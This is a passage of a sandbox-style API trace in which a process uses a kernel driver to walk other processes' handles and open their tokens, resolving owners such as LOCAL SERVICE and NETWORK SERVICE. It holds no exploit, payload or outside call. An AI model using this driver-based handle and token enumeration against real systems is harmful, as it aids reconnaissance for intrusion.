lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.110] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.110] PsAcquireProcessExitSynchronization () returned 0x0 [0245.110] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0) [0245.110] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800384cc80, HandleInformation=0x0) returned 0x0 [0245.110] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.111] PsReleaseProcessExitSynchronization () returned 0x2 [0245.111] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0245.111] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.111] ObfDereferenceObject (Object=0xfffffa800384cc80) returned 0x1 [0245.111] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.111] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.111] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.111] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.111] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.111] PsAcquireProcessExitSynchronization () returned 0x0 [0245.111] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0) [0245.111] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.111] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.111] PsReleaseProcessExitSynchronization () returned 0x2 [0245.111] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0245.111] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.111] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.111] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.111] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.111] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.111] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.112] PsLookupProcessByProcessId (in: ProcessId=0x3ac, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.112] PsAcquireProcessExitSynchronization () returned 0x0 [0245.112] KeStackAttachProcess (in: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382db30, ApcState=0xfffff880053c85d0) [0245.112] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.112] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.112] PsReleaseProcessExitSynchronization () returned 0x2 [0245.112] ObfDereferenceObject (Object=0xfffffa800382db30) returned 0x3a [0245.112] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.112] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.112] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.112] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.112] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc8) returned 0xc8 [0245.112] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.112] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80038b5b30, HandleInformation=0x0) returned 0x0 [0245.112] ObOpenObjectByPointer (in: Object=0xfffffa80038b5b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0245.112] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xdd [0245.112] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002ffa140 | out: TokenHandle=0xfffffa8002ffa140*=0xc4) returned 0x0 [0245.112] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0245.112] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.113] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.113] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.115] CloseHandle (hObject=0xc4) returned 1 [0245.115] CloseHandle (hObject=0xc8) returned 1 [0245.115] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.115] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0245.115] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.115] PsAcquireProcessExitSynchronization () returned 0x0 [0245.115] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0) [0245.115] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003664470, HandleInformation=0x0) returned 0x0 [0245.115] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.115] PsReleaseProcessExitSynchronization () returned 0x2 [0245.115] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xdb [0245.116] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.116] ObfDereferenceObject (Object=0xfffffa8003664470) returned 0x1 [0245.116] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.116] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.116] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.116] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.116] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.116] PsAcquireProcessExitSynchronization () returned 0x0 [0245.116] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0) [0245.116] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8009e52310, HandleInformation=0x0) returned 0x0 [0245.116] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.116] PsReleaseProcessExitSynchronization () returned 0x2 [0245.116] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xdb [0245.116] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.116] ObfDereferenceObject (Object=0xfffffa8009e52310) returned 0x1 [0245.117] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.117] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.117] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.117] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.117] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.117] PsAcquireProcessExitSynchronization () returned 0x0 [0245.117] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0) [0245.117] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038e3da0, HandleInformation=0x0) returned 0x0 [0245.117] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.117] PsReleaseProcessExitSynchronization () returned 0x2 [0245.117] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xdb [0245.117] ObQueryNameString (in: Object=0xfffffa80038e3da0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.117] ObfDereferenceObject (Object=0xfffffa80038e3da0) returned 0x1 [0245.118] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.118] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.118] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.118] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0245.118] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.118] PsAcquireProcessExitSynchronization () returned 0x0 [0245.118] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0) [0245.118] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0245.118] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.118] PsReleaseProcessExitSynchronization () returned 0x2 [0245.118] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xdb [0245.118] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.118] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0245.119] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.119] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.119] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.119] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0245.119] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.119] PsAcquireProcessExitSynchronization () returned 0x0 [0245.119] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0) [0245.119] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002651760, HandleInformation=0x0) returned 0x0 [0245.119] ObfDereferenceObject (Object=0xfffffa8002651760) returned 0x1 [0245.119] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.119] PsReleaseProcessExitSynchronization () returned 0x2 [0245.119] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xdb [0245.119] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.119] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.120] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.120] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0245.120] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.120] PsAcquireProcessExitSynchronization () returned 0x0 [0245.120] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0) [0245.120] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0245.120] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.120] PsReleaseProcessExitSynchronization () returned 0x2 [0245.120] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xdb [0245.120] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.120] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x9 [0245.120] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.120] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.121] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.121] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0245.121] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.121] PsAcquireProcessExitSynchronization () returned 0x0 [0245.121] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880053c85d0) [0245.121] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039cf710, HandleInformation=0x0) returned 0x0 [0245.121] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.121] PsReleaseProcessExitSynchronization () returned 0x2 [0245.121] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xdb [0245.121] ObQueryNameString (in: Object=0xfffffa80039cf710, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.122] ObfDereferenceObject (Object=0xfffffa80039cf710) returned 0x1 [0245.122] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.122] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x11c) returned 0xc8 [0245.122] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0245.122] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80038c8b30, HandleInformation=0x0) returned 0x0 [0245.122] ObOpenObjectByPointer (in: Object=0xfffffa80038c8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0245.122] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb3 [0245.122] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002ffa140 | out: TokenHandle=0xfffffa8002ffa140*=0xc4) returned 0x0 [0245.122] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0245.122] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.122] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0245.122] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0245.124] CloseHandle (hObject=0xc4) returned 1 [0245.125] CloseHandle (hObject=0xc8) returned 1 [0245.125] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.125] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0245.125] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.125] PsAcquireProcessExitSynchronization () returned 0x0 [0245.125] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.125] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003429af0, HandleInformation=0x0) returned 0x0 [0245.125] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.125] PsReleaseProcessExitSynchronization () returned 0x2 [0245.125] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.125] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.125] ObfDereferenceObject (Object=0xfffffa8003429af0) returned 0x1 [0245.125] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.125] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.125] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.125] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0245.125] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.125] PsAcquireProcessExitSynchronization () returned 0x0 [0245.125] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.125] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038df930, HandleInformation=0x0) returned 0x0 [0245.126] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.126] PsReleaseProcessExitSynchronization () returned 0x2 [0245.126] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.126] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8508) returned 0x0 [0245.126] ObfDereferenceObject (Object=0xfffffa80038df930) returned 0x1 [0245.126] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.126] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.126] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.126] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0245.126] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0245.126] PsAcquireProcessExitSynchronization () returned 0x0 [0245.126] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880053c85d0) [0245.126] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80038e5d40, HandleInformation=0x0) returned 0x0 [0245.126] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0245.126] PsReleaseProcessExitSynchronization () returned 0x2 [0245.126] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0245.126] ObQueryNameString (in: Object=0xfffffa80038e5d40, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880053c8550) returned 0x0 [0245.126] ObfDereferenceObject (Object=0xfffffa80038e5d40) returned 0x3 [0245.126] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0245.126] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0245.126] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0245.126] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, 